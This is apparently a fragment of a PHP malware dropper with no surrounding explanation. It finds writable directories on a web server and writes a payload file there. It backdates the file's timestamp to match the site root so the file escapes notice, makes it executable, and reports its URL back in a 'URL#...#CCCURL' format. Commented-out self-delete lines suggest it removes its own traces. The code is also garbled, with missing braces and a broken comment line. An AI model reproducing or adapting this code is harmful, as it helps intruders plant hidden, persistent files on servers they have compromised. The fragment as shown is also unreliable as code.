if (!($base_local_path_time = @stat($base_local_path."/index.php")))

if (!($base_local_path_time = @stat($base_local_path."/index.html")))

if (!($base_local_path_time = @stat($base_local_path."/..")))

if (!($base_local_path_time = @stat($base_local_path)))

$base_local_path_time = Array();

$base_local_path_time['mtime'] = time();

$base_local_path_time = $base_local_path_time['mtime'];
$dir_list_writable = GetWritableDirs();

if (count($dir_list_writable) == 0)

echo "URL#STATUS_UNWRITABLE";

exit();

usort($dir_list_writable, 'comparer'); # sort directory by len

$list_writable = Array();

$list_writable[] = $dir_list_writable[0];

$list_writable[] = $dir_list_writable[rand(0,sizeof($dir_list_writable))];

$good = FALSE;

$good_counter = 0;

# try to upload

$max_tryes = strlen($payload_name) == 0 ? 5 : 1;

foreach ($list_writable as $current_dir)

// if payload name is set, no more one try to upload on current dir

//for ($i=0; $i < $max_tryes; $i++)

if (strlen($payload_name) == 0)

$temp_payload_name = generateRandomString();

else

$temp_payload_name = $payload_name;

}
 $full_payload_name = $current_dir . DIRECTORY_SEPARATOR . $temp_payload_name;

$uri_path = GetPathDiff($base_local_path, $full_payload_name);

if (strpos($uri_path, $temp_payload_name) === false)

$uri_path = $uri_path . "/" . $temp_payload_name;

$full_uri = $base_www_path . (strpos($uri_path, "/") == 0 ? $uri_path : "/".$uri_path);

if (WritePayload($full_payload_name, $payload_file))

touch($full_payload_name, $base_local_path_time); // set last modification time as root

folder

chmod($full_payload_name, 0755);

echo "URL#http://" . $full_uri . PHP_EOL;

$good=TRUE;

$good_counter++;

if ($good_counter >1)

//unlink("dfaonfpfkwg.php");

echo "#CCCURL";

exit();

if(!$good)

echo "URL#STATUS_CANTUPLOAD#CCCURL";

echo "#CCCURL";

//unlink("dfaonfpfkwg.php");

exit();